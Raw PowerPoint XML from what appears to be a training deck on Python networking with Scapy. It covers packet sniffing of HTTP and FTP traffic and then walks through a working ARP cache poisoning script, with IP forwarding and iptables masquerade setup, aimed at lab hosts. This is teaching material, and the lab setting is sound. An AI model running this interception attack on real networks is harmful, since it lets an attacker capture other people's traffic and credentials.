                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filter</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port 80 or </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port 21"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wrpcap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output.pcap</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packets)</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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8837747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Sniffing with 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Sniff packets on ports 80 (HTTP) &amp; 21 (FTP) and show them through a callback function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>packet_callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</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109</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654815"/>
            <a:ext cx="9372047"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scapy.all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sniff, TCP, IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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packet_callback</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received_packet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received_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[TCP].payload) &gt;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"Destination:"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received_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[IP].</a:t>
            </a:r>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err="1">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Data</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bytes</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received_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[TCP].payload))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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sniff(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filter</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port 80 or </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port 21"</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packet_callback</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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24029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Making simple HTTP GET/POST requests with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>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24289" y="2951577"/>
            <a:ext cx="10137507" cy="156966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requests.post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"PpqVUzjun3lTbkP3nP6H.."</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"email"</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khalid@omani.cloud</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"password"</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"hello123"</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a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Page Expired"</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res.text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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make HTTP POST requests as follows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0089F77-90FA-47BE-A821-77413E458FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087956" y="4751900"/>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Page Expired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the response is because the CSRF token is not valid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5354CB7E-6673-42B2-ABE6-797DBA94856E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1029283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Sniffing with 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Instead of sniffing, you can make Scapy read packets from a PCAP file:</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110</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654815"/>
            <a:ext cx="9372047"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scapy.all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sniff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdpcap</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packets = sniff(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>offline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output.pcap</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(packets)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packets.nsummary</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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37029884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Sniffing with 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you’re planning to read a large PCAP file, it’s recommended to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>sniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> rather than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>rdpcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>rdpcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> loads the entire file into memory).</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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA2B644-215A-4071-9504-7F7E38198575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704474" y="2847320"/>
            <a:ext cx="9372047" cy="95410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process_packet</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pkt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sniff(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>offline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my_large_pcap_file.pcap</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process_packet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35495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ARP Cache Poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ARP Cache Poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is essentially a way to try to trick the target into thinking that you’re the gateway. It can also involve tricking the gateway to think that traffic must go to you in order to reach the target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Diagram&#10;&#10;Description automatically generated">
            <a:hlinkClick r:id="rId4"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F80256B5-365E-4B7E-93D7-C75679545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570" y="2805627"/>
            <a:ext cx="6947956" cy="4039748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4154027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Using Scapy, you can perform the ARP poisoning attack in just one line of code:</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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF94528C-44BD-4A96-A439-42C849975F69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706403" y="2610699"/>
            <a:ext cx="10583229"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srloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ARP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hwsrc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attacker_mac_address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target_gateway_ip</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hwdst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target_mac_address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792214C4-AC2C-4F99-AC04-F1788938D745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712420" y="3037519"/>
            <a:ext cx="10094495" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, the target machine will send us any packet that’s intended to go to the internet. In other words, we’ll be the target’s gateway.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, the attacker’s machine will not forward packets by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To make it forward packets, you’ll need to enable the option (this is already done for you):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{122169DC-F168-4709-84EC-A7BABAD3C378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706402" y="4435489"/>
            <a:ext cx="10583229"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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -w net.ipv4.ip_forward=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC82E3C0-FABD-4CFE-88C2-8286077EF7BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706402" y="4923376"/>
            <a:ext cx="10583228"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also enable our attacker machine (server1) to masquerade traffic (this is already done for you):</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172EA4B6-AED1-4FFC-B1A5-1775BE8B102E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706402" y="5485568"/>
            <a:ext cx="10583229"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400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -A POSTROUTING -j MASQUERADE</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2755677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286232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we are ready to write a script to poison the target’s ARP cache. Our script will need to do the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Get the MAC address of any host on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Do ARP cache poisoning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Restore the ARP cache of the target once the attack is stopped.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>First, we will import relevant functions to our program:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>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114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FB3F58-28ED-4F45-84E6-BDEDBFBA4BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299994" y="4150062"/>
            <a:ext cx="10583229"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time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sleep</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scapy.all</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(ARP, Ether, send, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>srp</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get_if_hwaddr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getmacbyip</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4354399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A function to perform ARP cache poisoning will look like the following:</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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FB3F58-28ED-4F45-84E6-BDEDBFBA4BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299994" y="2429546"/>
            <a:ext cx="10583229" cy="224676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do_poison_arp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attacker_mac</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send(ARP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hwsrc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attacker_mac</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hwdst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target_ip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verbose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sleep(</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756451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A function to restore everything back to normal will look like the following:</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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FB3F58-28ED-4F45-84E6-BDEDBFBA4BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299994" y="2429546"/>
            <a:ext cx="10583229"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restore_arp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original_gw_mac</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send(ARP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hwsrc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original_gw_mac</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hwdst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pdst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target_ip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verbose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2744503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main function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> should look like the following:</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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FB3F58-28ED-4F45-84E6-BDEDBFBA4BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299994" y="2429546"/>
            <a:ext cx="10583229"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iface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attacker_mac</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get_if_hwaddr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iface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getmacbyip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original_gw_mac</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getmacbyip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"Poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ARP cache of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target_ip</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do_poison_arp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attacker_mac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KeyboardInterrupt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"Restoring ARP cache.."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restore_arp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original_gw_mac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target_gw_ip</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target_mac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target_ip</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32672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ARP Cache Poisoning with Scapy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Finally, we receive input supplied to our program through the user’s supplied arguments:</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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FB3F58-28ED-4F45-84E6-BDEDBFBA4BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299994" y="2429546"/>
            <a:ext cx="10583229"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&lt;target&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>target_gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;"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172.16.238.12 172.16.238.1 eth0"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B46CC6B4-72B2-40EB-A7DC-06ABD7FE41FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574609" y="4075992"/>
            <a:ext cx="10370118"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this program now, all traffic from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>172.16.238.12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>will be forwarded to the attacker IP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>172.16.238.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in this case), which means that the attacker will be able to view all traffic coming from the target to the internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The attacker can capture traffic through the sniffer we have written previously or any other capturing tool such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
